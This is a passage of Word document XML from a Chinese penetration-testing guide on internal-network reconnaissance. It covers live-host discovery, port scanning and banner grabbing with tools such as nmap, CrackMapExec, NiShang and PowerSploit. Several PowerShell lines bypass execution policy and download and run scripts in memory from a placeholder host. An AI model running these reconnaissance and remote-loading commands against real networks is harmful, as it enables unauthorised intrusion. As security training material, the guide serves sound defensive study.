          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1654810"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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title="fig:"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1655226"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="X8a59d5601c909e81c9b80bfacc3789886cfa333"/>
      <w:r>
        <w:t>(2)、基于NetBIOS(网络基本输入/输出系统)协议发现存活主机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 向局域网的每个IP地址发送NetBIOS状态查询，可以获取主机名、MAC地址等信息。 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.unixwiz.net/tools/nbtscan.html#download" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>NBTScan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>用于扫描Windows网络上NetBIOS名称的程序，用于发现内网存活的windows主机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>nbtscan.exe 10.10.10.0/24</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="Xb74c8331762988125100a21aacffea2777ffff6"/>
      <w:r>
        <w:t>(3)、基于UDP发现存活主机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Unicornscan是Kali上的一款信息搜集工具，提供了网络扫描功能，使用起来感觉有点慢。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>unicornscan -mU 10.10.10.0/24</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="X2991d4e007d7d9b020f980ae8de946864a08071"/>
      <w:r>
        <w:t>(4)、基于ARP发现存活主机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="aarp-scan"/>
      <w:r>
        <w:t>(a)、</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/QbsuranAlang/arp-scan-windows-" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>ARP-Scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>arp-scan.exe -t 10.10.10.0/24</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="binvoke-arpscanps1"/>
      <w:r>
        <w:t>(b)、</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/situational_awareness/network/Invoke-ARPScan.ps1" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>Invoke-ARPScan.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>powershell.exe -exec bypass -Command "Import-Module ./Invoke-ARPScan.ps1; Invoke-ARPScan -CIDR 10.10.10.0/24"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//本地加载</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>powershell.exe -exec bypass -Command "IEX(New-Object System.Net.Webclient).DownloadString('http://your-ip:port/Invoke-ARPScan.ps1'); Invoke-ARPScan -CIDR 10.10.10.0/24"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//远程加载</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkEnd w:id="32"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="Xa6f7edef14780d8c078c8082dab32a4084387bc"/>
      <w:r>
        <w:t>(4)、基于SMB(Server Message Block，服务器消息块)协议发现存活主机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> SMB又被称为网络文件共享系统(Common Internet File System，CIFS)协议，一般使用NetBIOS或TCP发送，分别使用139或445端口，目前倾向于使用445端口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 在实际利用中，可以探测局域网中存在的SMB服务，从而发现内网存活的主机，多用于windows主机的发现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> CrackMapExec(简称CME)是一款后渗透利用工具，在Kali上可以直接使用apt-get命令安装。CrackMapExec能够枚举登录用户、枚举SMB服务列表，执行WINRM攻击等功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>crackmapexec smb 10.10.10.0/24</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="Xb1a5606bd386a6cb035200546883912c82bae3d"/>
      <w:r>
        <w:t>(5)、更多的工具可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>https://wiki.wgpsec.org/knowledge/hw/host-survival-domain.html</w:t>
      </w:r>
      <w:r>
        <w:t>处查看。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkEnd w:id="34"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="X958ac778182a33c252601ae130e03630f350a3b"/>
      <w:r>
        <w:t>2、内网端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="X2f862415323cbf16d670e4ed66134d6f27d01bd"/>
      <w:r>
        <w:t>(1)、利用Telnet探测端口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Telnet可以简单测试指定端口是正常打开还是关闭状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>telnet &lt;IP&gt; &lt;Port&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="Xf209a08ab70f411e32556ddbcdf39300d275a7f"/>
      <w:r>
        <w:t>(2)、利用Nmap进行端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>nmap -p 80,88,135,139 10.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//扫描目标主机的指定端口</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>nmap -sS -p 1-65535 10.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//扫描目标主机开放的全部端口</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>nmap -sC -sV -p 80,88,135,139 10.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//扫描并获取目标主机指定端口上开放的服务版本</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="X922c01f089d0097cbd1e05d40eab0e60ce0a730"/>
      <w:r>
        <w:t>(3)、利用powershell进行端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="anishang"/>
      <w:r>
        <w:t>(a)、NiShang</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/samratashok/nishang" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>NiShang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>是基于powershell的渗透测试专用框架，集成了各种脚本和payload。NiShang的Scan模块有一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Invoke-PortScan.ps1</w:t>
      </w:r>
      <w:r>
        <w:t>可以用来对主机进行端口扫描。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Invoke-PortScan -StartAddress 10.0.0.1 -EndAddress 10.0.0.10 -ResolveHost -ScanPort</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>powershell.exe -exec bypass -Command "IEX(New-Object System.Net.Webclient).DownloadString('http://your-ip:port/Invoke-PortScan.ps1'); Invoke-PortScan -StartAddress 10.0.0.1 -EndAddress 10.0.0.10 -ResolveHost -ScanPort"</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="bpowersploit"/>
      <w:r>
        <w:t xml:space="preserve">(b)、PowerSploit </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t>PowerSploit 的</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>Invoke-Portscan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://Your-IP:port/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.7.7 -T 4 -ports '445,1433,80,8080,3389'"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>powershell.exe -exec bypass -Command "Import-Module ./Invoke-Portscan.ps1;Invoke-Portscan -Hosts 192.168.7.7 -T 4 -ports '445,1433,80,8080,3389'"</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkEnd w:id="40"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="Xfab09d5e2abc4c8ca662ebbe47df0c4e27ccd74"/>
      <w:r>
        <w:t>(4)、利用</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://eternallybored.org/misc/netcat/" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>进行端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>nc.exe -vv 10.0.0.1 3389</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//单个端口扫描</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>nc.exe -rz -w 2 -vv 10.0.0.1 0-65535</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>//多个端口扫描</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="X3f8131d2361808af6323dbb5ad08e13dd96ed02"/>
      <w:r>
        <w:t>(5)、利用</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/shadow1ng/fscan" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>fscan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>进行端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>fscan.exe -h 192.168.7.7 -p 22,445</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="X16d0596f0b7a449a67756f324822953b9d75fc4"/>
      <w:r>
        <w:t>(6)、利用msf进行端口扫描</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkEnd w:id="43"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="X52b3fa348f3adc615ab687ebeab4c8e9bda3cfa"/>
      <w:r>
        <w:t>3、获取端口Banner信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 在获取Banner后可以在漏洞库中查找对应CVE编号的POC、EXP，在ExploitDB、Seebug等平台上查看相关的漏洞利用工具，从而进行验证漏洞是否存在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="X3723f15589c30bacdea326d694c5b2d50c3599c"/>
      <w:r>
        <w:t>(1)、利用netcat获取端口Banner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> NetCat的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>-nv</w:t>
      </w:r>
      <w:r>
        <w:t>选项可以在连接指定端口时获取端口的Banner信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>nc -nv &lt;IP&gt; &lt;Port&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="Xf47c90fdbaad003f12f80fe5f5b3f1a7888b58b"/>
      <w:r>
        <w:t>(2)、利用Telnet获取端口Banner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 如果目标端口开放，利用Telnet连接后也会返回相应的Banner信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>telnet &lt;IP&gt; &lt;Port&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="X607a581b6e3bd14c62d1ebddf63628838439e5b"/>
      <w:r>
        <w:t>(3)、利用Nmap获取端口Banner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> nmap中指定脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>--script=banner</w:t>
      </w:r>
      <w:r>
        <w:t>可以在端口扫描过程中获取端口的Banner。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>nmap --script=banner -px &lt;Ports&gt; &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="47"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="X26e815a1605b3e4a51e32fe3d511dd0de99b871"/>
      <w:r>
        <w:t>(4)、常见端口Banner及攻击方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>文件共享服务端口</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="29"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1494"/>
        <w:gridCol w:w="2805"/>
        <w:gridCol w:w="4536"/>
      </w:tblGrid>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>端口号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>端口说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>使用说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:t>、2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:bookmarkStart w:id="64" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="64"/>
            <w:r>
              <w:t>、69</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>FTP/TFTP文件传输协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>允许匿名的上传、下载、爆破和嗅探操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>2049</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>NFS服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>配置不当</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>389</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>LADP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
